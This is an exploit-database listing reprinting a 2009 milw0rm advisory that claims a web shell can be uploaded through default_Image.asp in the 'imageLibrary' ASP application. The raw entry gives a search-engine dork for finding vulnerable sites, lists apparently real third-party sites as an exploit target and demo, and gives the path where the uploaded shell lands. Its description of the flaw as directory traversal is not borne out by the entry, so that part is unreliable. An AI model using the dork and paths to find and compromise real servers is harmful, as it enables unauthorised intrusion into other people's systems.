header-logo
Suggest Exploit
vendor:
N/A
by:
mr.al7rbi
7.5
CVSS
HIGH
ImageLibrary
22
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

upload shell

An attacker can upload a malicious ASP shell to the vulnerable server by exploiting the default_Image.asp file. This file is vulnerable to directory traversal attacks, allowing an attacker to upload a malicious ASP shell to the vulnerable server.

Mitigation:

Restrict access to the default_Image.asp file and ensure that the file is not accessible from the web.
Source

Exploit-DB raw data:

                         ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .  


################################################################
#           upload shell
#
#           Found by ::: mr.al7rbi
#
#           Contact  ::: n16 [at] live.com
#
#           my Group ::: islam-defenders Team
#
################################################################


[+] Title: imageLibrary


[dork]

inurl:"default_Image.asp"

[+] EXPLOITS:

http://www.site.com/imageLibrary//admin/images/default_Image.asp

[exp:]  

http://www.davidhalpernmd.com/manage_tbps/default_Image.asp

[demo]

]http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp

[shell be like ]

http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp


[+] Special  Greetz for :  www.sec-code.com

[+] Greetz : MaTrEx  & samkmk.almkkar & 3lo0osh  &  ili The General ili & Super-Code & BxH &all tryag members & all muslims

# milw0rm.com [2009-03-02]

Navigation

Suggest Exploit

Services By CQR